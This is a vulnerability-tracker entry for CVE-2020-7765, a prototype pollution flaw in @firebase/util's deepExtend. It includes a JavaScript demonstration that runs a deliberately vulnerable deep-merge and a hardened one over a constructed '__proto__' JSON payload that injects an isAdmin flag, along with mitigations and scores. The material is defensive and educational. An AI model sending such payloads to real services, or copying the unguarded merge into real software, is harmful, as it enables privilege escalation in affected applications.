CVE-2020-7765

MEDIUM

@firebase/util <0.3.4 - Prototype Pollution via deepExtend

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2020-7765, a PoC published by AikidoSec.

AI-analyzed exploit summary
This repository contains a functional proof-of-concept for CVE-2020-7765, demonstrating prototype pollution in the `@firebase/util` package via the `deepExtend` function. The PoC includes both vulnerable and protected test cases, showcasing the exploit and mitigation.

Description

This affects the package @firebase/util before 0.3.4. The vulnerability is in the deepExtend function in DeepCopy.ts, which recursively copies every own key of a source object into a target object without checking the key name. If attacker-controlled input reaches deepExtend (for example a parsed JSON document containing a `__proto__` key), the recursive copy resolves `target["__proto__"]` to Object.prototype and writes the nested keys onto it, polluting the prototype shared by every plain object in the program.
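The following is an added example, not code from @firebase/util or from the AikidoSec repository: a simplified recursive deep-merge modelled on the pre-0.3.4 deepExtend logic (the exact shape is an assumption; only the absence of a key check matters), side by side with a hardened variant, run over a constructed JSON payload. The upstream patch rejects the `__proto__` key; rejecting `constructor` and `prototype` as well is an assumption of this example, not something the page states.

```javascript
'use strict';

// Added example (not @firebase/util's or AikidoSec's code): a simplified
// recursive deep-merge modelled on the pre-0.3.4 deepExtend logic. The
// shape is an assumption; only the missing key check matters here.
function makeDeepExtend(isValidKey) {
  return function deepExtend(target, source) {
    if (!(source instanceof Object)) {
      return source;                     // primitives are copied by value
    }
    switch (source.constructor) {
      case Date:
        return new Date(source.getTime());
      case Object:
        if (target === undefined) target = {};
        break;
      case Array:
        target = [];
        break;
      default:
        return source;                   // class instances are passed through
    }
    for (const prop in source) {
      if (!Object.prototype.hasOwnProperty.call(source, prop)) continue;
      if (!isValidKey(prop)) continue;   // the guard the patch introduced
      // With prop === '__proto__', target[prop] resolves to Object.prototype
      // and the recursive call writes the nested keys onto it.
      target[prop] = deepExtend(target[prop], source[prop]);
    }
    return target;
  };
}

// Vulnerable: every own key is accepted, including '__proto__'.
const deepExtendVulnerable = makeDeepExtend(() => true);

// Hardened: reject keys that reach a prototype. The upstream fix rejects
// '__proto__'; 'constructor' and 'prototype' are added here as an assumption.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const deepExtendFixed = makeDeepExtend((key) => !BLOCKED_KEYS.has(key));

// Constructed attacker input: a JSON body that a server merges into defaults.
// JSON.parse creates an OWN enumerable property literally named "__proto__".
const PAYLOAD = '{"name":"guest","__proto__":{"isAdmin":true}}';

// Merge the payload with the given deepExtend and report whether an unrelated
// object picked up the injected property. Cleans Object.prototype afterwards
// so repeated runs start from a clean global state.
function runScenario(deepExtend) {
  const config = deepExtend({ name: 'default', retries: 3 }, JSON.parse(PAYLOAD));
  const unrelated = {};
  const result = {
    nameMerged: config.name === 'guest',
    retriesKept: config.retries === 3,
    unrelatedPolluted: unrelated.isAdmin === true,
    ownProtoKeyOnConfig: Object.prototype.hasOwnProperty.call(config, '__proto__'),
  };
  delete Object.prototype.isAdmin;
  return result;
}

console.log('vulnerable:', runScenario(deepExtendVulnerable));
console.log('fixed:     ', runScenario(deepExtendFixed));
```

Note that in the vulnerable run the `__proto__` key never lands on `config` itself (the assignment hits the `__proto__` setter), so inspecting the merged object tells you nothing; the damage shows up on an unrelated empty object. Beyond upgrading, the usual defence-in-depth measures apply: merge into objects created with `Object.create(null)`, or start Node with `--disable-proto=delete` so the `__proto__` accessor is removed from Object.prototype.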

Exploits (1)

github · WORKING POC · 6 stars
by AikidoSec · tags: javascript, poc
https://github.com/AikidoSec/zen-0-days/tree/main/node/CVE-2020-7765


Classification: Working PoC (95% confidence)
Attack Type: Other
Complexity: Trivial
Reliability: Reliable
Target: @firebase/util (versions affected by CVE-2020-7765)
Authentication: none needed
Prerequisites: Node.js environment · @firebase/util package
Analyzed by devstral-2 on Feb 27, 2026

References (3)

Exploit, Third Party Advisory (x_refsource_MISC): https://snyk.io/vuln/SNYK-JS-FIREBASEUTIL-1038324
Patch, Third Party Advisory (x_refsource_MISC): https://github.com/firebase/firebase-js-sdk/pull/4001

Scores

CVSS v3.1 base score: 5.6 (Medium)
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
Attack Vector: Network
EPSS: 0.0056 (0.56%), percentile 42.3%

Details

Status: published
Products (2):
  firebase/util 0 - 0.3.4 (npm)
  google/firebase/util < 0.3.4
Published: Nov 16, 2020
Tracked since: Feb 18, 2026